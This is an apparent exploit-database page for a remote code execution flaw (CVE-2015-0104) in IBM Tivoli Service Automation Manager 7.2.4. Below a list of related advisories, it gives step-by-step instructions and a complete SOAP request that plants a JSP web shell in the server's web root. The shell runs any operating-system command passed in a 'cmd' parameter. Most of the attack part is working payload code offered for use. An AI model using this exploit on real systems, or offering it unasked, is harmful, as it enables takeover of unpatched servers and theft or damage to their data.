IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution Vulnerability

🗓️ 10 Feb 2015 00:00:00Reported by Jakub PalaczynskiType

zdt🔗 0day.today👁 54 Views

IBM Tivoli Service Automation Manager 7.2.4 Remote Code Executio

Reporter	Title	Published	Views	Family All 10
IBM Security Bulletins	Security Bulletin: Cross-Site Scripting (XSS) and Remote Code Execution Vulnerabilities Affecting Asset and Service Management (CVE-2015-0104, CVE-2015-0107, CVE-2015-0108, CVE-2015-0109)	17 Jun 201814:55	–	ibm
CNVD	Arbitrary Code Execution Vulnerability in Multiple IBM Devices	25 Apr 201700:00	–	cnvd
CVE	CVE-2015-0104	24 Apr 201706:12	–	cve
Cvelist	CVE-2015-0104	24 Apr 201706:12	–	cvelist
Exploit DB	IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution	12 Dec 201400:00	–	exploitdb
EUVD	EUVD-2015-0142	7 Oct 202500:30	–	euvd
NVD	CVE-2015-0104	24 Apr 201706:59	–	nvd
Prion	Design/Logic Flaw	24 Apr 201706:59	–	prion
Prion	Cross site scripting	18 Feb 201502:59	–	prion
Prion	Cross site scripting	18 Feb 201502:59	–	prion

# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104
 
1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:
 
POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1
 
Host: site
Content-Length: xxx
 
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>
 
<%
 
      try {
 
      String cmd;
 
String[] cmdarr;
 
String OS = System.getProperty("os.name");
 
    if (request.getParameter("cmd") != null) {
 
        cmd = new String (request.getParameter("cmd"));
 
      if (OS.startsWith("Windows")) {
 
       cmdarr = new String [] {"cmd", "/C", cmd};
 
      }
 
      else {
 
       cmdarr = new String [] {"/bin/sh", "-c", cmd};
 
      }
 
      Process p = Runtime.getRuntime().exec(cmdarr);
 
      OutputStream os = p.getOutputStream();
 
      InputStream in = p.getInputStream();
 
      DataInputStream dis = new DataInputStream(in);
 
      String disr = dis.readLine();
 
      while ( disr != null ) {
 
        out.println(disr);
 
        disr = dis.readLine();
 
      }
 
    }
 
      } catch (Exception e) { e.printStackTrace();}     
 
%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>
 
4. Web shell is now ready to use in path specified in __document parameter's value

#  0day.today [2018-03-19]  #

10 Feb 2015 00:00Current

8.8High risk

Vulners AI Score8.8

EPSS0.02037